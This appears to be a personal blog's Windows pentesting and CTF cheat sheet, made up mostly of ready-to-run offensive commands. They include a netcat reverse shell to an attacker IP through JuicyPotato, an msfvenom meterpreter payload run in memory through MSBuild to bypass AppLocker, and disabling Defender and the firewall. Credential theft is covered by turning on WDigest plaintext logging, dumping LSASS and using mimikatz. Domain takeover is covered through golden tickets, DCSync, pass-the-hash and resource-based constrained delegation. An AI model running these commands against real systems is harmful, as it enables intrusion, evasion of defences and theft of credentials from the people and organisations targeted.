f4d3

f4d3

InfoSec enthusiast | pwn | RE | CTF | BugBounty

Windows Cheat-Sheet

What’s here ?

  • Some essential enum things. :smile:
  • Some powershell kung-fu master-fu

Enum scripts/bins:

General

Check general info:

systeminfo
whoami /privs
hostname

Check drives:

get-psdrive

Dir (Including hiddens) powershell:

get-childitem -force

Check users/localgroups on the local machine:

Local users

net users

Local localgroups

net localgroups

Get info about some user

net users "USERNAME"

View member of domain group

net group /domain "GROUP NAME"

Check firewall on the local machine:

netsh firewall show state
netsh firewall show config

Network:

Check local ip config:

ipconfig /all

Check local route:

route print

Check local arp table:

arp -a

Check local listening ports:

netstat -ano

Search things - misc:

Search items by SID:

C:\*.* /findsid HACKBACK\project-managers /T /C | findstr /R /C:"[SIDFound]

Search by string:

findstr /si password *.txt
findstr /si password *.ini
findstr /si password *.xml

Files that normally contain plain-text passwords:

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

Search for writable dir:

dir /a-r-d /s /b

Search files (METERPRETER):

search -f *.exe

Look for scheduled tasks:

schtasks /query /fo LIST /v

Look for some services:

Get-ChildItem 'HKLM:SYSTEM\CurrentControlSet\Services'
sc.exe qc
sc.exe query SERVICE_NAME

Special SeImpersonatePrivilege:

Its nice to use juicy-potato if the priv is active.

juicypotato -l 1337 -p C:\windows\system32\cmd.exe -a "/c C:\path\to\nc.exe -e cmd.exe attacker_ip port" -t *

Get permissions with icacls :

icacls C:\path\to\file

Grant permission to user:

icacls c:\path\to\file /grant USERNAME(OI)(CI)F /T

I have creds, what I can do?

Impersonate someone!

First, we create a cred-object:

$password = ConvertTo-SecureString 'PASSWORD' -AsPlainText -Force

Here, we can save de creds as a “SecureString”.

$credential = New-Object System.Management.Automation.PSCredential ('USERNAME', $password)
invoke-command -ComputerName "ComputerName" -ScriptBlock {ping -n 3 10.10.10.10} -Credential $credential

Add the flag -Authentication CredSSP, to the invoke-command shot if you’re experiencing problems with powershell double hop problem

NOTE, If we have the “SecureString saved”, we can load it into a cred object, and read the plaintext password!

$credential.GetNetworkCredential().Password

We can use net use for manage local drives! “A mount point”

net use z: \\IP_ADDRESS\c$ /user:USERNAME PASSWORD

Look for everything on one file (Alternative streams):

Get-Itemproperty -path C:\path\to\file
Get-Item -path C:\path\to\file -force -stream *

Read a certain stream

Get-Content -path C:\path\to\file -force -stream selected_stream

Have permission to check logs ?

check this

Disable AV - windows defender:

Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Disable firewall:

netsh advfirewall set allprofiles state off

Activate plaintext-cred-log

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Query Domains Controllers via dig

dig srv _ldap._tcp.dc._msdcs.test.domain.local @DC_IP

Make a meterpreter shell in CSHARP, and execute in-memory with MSBUILD (Great!):

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f csharp -e x86/shikata_ga_nai -i 20

Put the generated shellcode inside this snippet of MSBUILD (Replace the shellcode var) MSBuild template

Save it into a nice dir, (Applocker bypass) i.e:

C:\Windows\System32\spool\drivers\color
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\System32\spool\drivers\color\fade.xml

Make it persistent!

run persistence -U -i 60 -p LPORT -r LHOST

Look for weak permissions:

If a binary is installed by the user, and we have read/write acces on it, we can rename the .exe file and put our own.

cacls C:\path\to\bin.exe
BUILTIN\Users:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F

with that, we can rewrite the .exe with our own:

#include <stdlib.h>
int main ()
{
int i;
    i = system("net localgroup administrators theusername /add");
return 0;
}

Compile it:

i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe

Place it instead of the original, and restart the service that is using the executable.

net stop SERVICE_NAME && net start SERVICE_NAME.
# or
sc.exe start SERVICENAME
# or
wmic service SERVICE_NAME call startservice

File download

Invoke-WebRequest -Uri "http://attacker_ip/file" -OutFile "C:\path\to\file"

Getting everything with juicy potato (W server 2012 –)

Download the binary from here Get r00t

juicypotato.exe -l 9001 -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -p c:\windows\system32\cmd.exe -a "/c whoami > C:\r00t.txt"

Basic ldap querys

ldapsearch -h <ip_address> -x -b "DC=DOMAIN_NAME,DC=LOCAL"

Basic mimiktaz querys

Basic

privilege::debug
log logfile.log

Logon passwords and PTH

sekurlsa::logonPasswords full
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

Kerberos craft a golden ticket

kerberos::list /export
kerberos::ptt c:\ticketname.kirbi
kerberos::golden /admin:Administrator /domain:test.domain /sid:domain-sid /krbtgt:KRBTGT-hash /ticket:ticketname.kirbi

LSA / SAM (Local creds)

token::elevate  # get system
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache

lsass.exe dump and read

Beware that Falcon will cry about this

procdump.exe -ma lsass.exe lsass.dmp
# With minidump
invoke-webrequest -uri https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1 -outfile mini.ps1
import-module .\mini.ps1
Get-Process lsass | Out-Minidump
# Now on mimi
sekurlsa::minidump lsass.dmp
sekurlsa::LogonPasswords

Do a DCSync

If you’re domain admin, you could retrieve the hashes via dcsync on any computer (find an old XP/win7 :D)

log dcsync.log
lsadump::dcsync /domain:domain.local /all /csv

Basic RUBEUS querys

Get SPN Tickets for a specific.domain

.\rubeus.exe kerberoast /domain:specific.domain

If we’re in as a Domain Admin (mimikatz, wiki):

A dcsync attack with mimi:

log
lsadump::dcsync /domain:DOMAIN_NAME /user:USER_NAME /all

Create golden ticket with mimi:

kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN-SID  /krbtgt:KRBT_HASH /ticket:FILENAME /groups:GROUPS

Use it!

kerberos::ptt Filename
dir \\DomainController\\C$
psexec \\DomainController cmd.exe

Wanna dump ldap as a domain controller ?

python2.7 windapsearch.py -d HTB.LOCAL --dc-ip dc_ip -u domain_name\\dc_username -p dc_password -l all

Wanna dump the hashes ?

secretsdump.py domain/username:password@10.10.10.103

have the hashes? shell:

wmiexec.py -hashes First_part_of_hash:second_part_of_hash <domain_name>/administrator@remote_ip

Decrypt EFS files with mimikatz

cipher /c "C:\users\administrator\desktop\root.txt"

Export public key:

mimikatz $ crypto::system /file:"C:\users\administrator\appdata\roaming\microsoft\systemcertificates\my\certificates\FB154575993A250FE826DBAC79EF26C211CB77B3" /export

Get private key:

mimikatz $ dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85"

Decrypt private key:

dpapi::masterkey dpapi::masterkey /in:"C:\users\administrator\appdata\roaming\microsoft\protect\S-1-5-21-3107372852-113
2949149-763516304-500\9e78687d-d881-4ccb-8bd8-bc0a19608687" /password:"PASSWORD"

Create the certificate:

dpapi::capi /in:"C:\users\administrator\appdata\roaming\microsoft\crypto\rsa\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85" /masterkey:"8ed6519c4d09a506504c4f611203bea8979a385f8a444fe57b5d2256ee1e4eb34392a141f502cd9aeea8d2187c2525c3ae998dc3cebad81cc4e41dbb6bc65fa8"

On our own box:

openssl x509 -inform DER -outform PEM -in FB154575993A250FE826DBAC79EF26C211CB77B3.der -out public.pem  

openssl rsa -inform PVK -in raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk -out private.pem  

openssl pkcs12 -in public.pem -inkey private.pem -password pass:fade -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Now we export the cert, on the victim box:

C:\Windows\System32\spool\drivers\color>certutil -user -p fade -importpfx cert.pfx NoChain,NoRoot                            

Now we can read anything encrypted with that key !

Resourced based constrained delegation

If you have GenericAll over a computer.

Abuse LAPS

LAPS is the MSFT solution to have passwordless machine admins. The password is stored on a extended attribute called ms-Mcs-AdmPwd. With full control over the computer, you can read this entry and log in as a local administrator.

ldap dumber

python laps.py -u user -p password -d domain.local

Resouced based constrained delegation

By creating a new computer in the AD, we’re able to give permissions to that new object to impersonate any user against it. It’s important to point out that this is only usable on the target computer.

# using powermad.ps1, create and join a new computer to the AD.
New-MachineAccount -MachineAccount newbox -Password $(ConvertTo-SecureString 'SuperPass666!' -AsPlainText -Force)

# Using powerview.ps1, edit the permissions.

$ComputerSid = Get-DomainComputer newbox -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

# Set the `AllowedToActOnBehalfOfOtherIdentity`
$targetComputer = "DC" # where we have the permissions (not the fake box)
Get-DomainComputer $targetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# with rubeus, get the `RC4_HMAC` password hash of the new machine.

.\r.exe hash /password:SuperPass666!

# Get a service ticket as an admin against the target computer.

.\r.exe s4u /user:newbox$ /rc4:<RC4_HMAC hash> /impersonateuser:Administrator /msdsspn:cifs/DC.testlab /ptt

# Now, with the ticket in memory, do a psexec against the pc :) !

klist
psexec.exe -accepteula \\DC cmd

This can be done via linux too.

# add a new fake computer
impacket-addcomputer.py -method SAMR -computer-name newbox$ -computer-pass 'SuperPass666!' testlab.local/victim:victim_password

# using https://github.com/tothi/rbcd-attack
python3 rbcd.py -f newbox -t HIVE -dc-ip 10.10.10.10 testlab.local\\victim:victim_password

# Get the ticket

impacket-getST.py -spn cifs/victim_pc.testlab.local testlab.local/newbox\$ -impersonate administrator

# The ticket will be saved as administrator.ccache
export KRB5CCNAME=$PWD/administartor.ccache

impacket-wmiexec.py -k -no-pass testlab.local/administrator@vicim_pc.testlab.local

updated_at 31-08-2022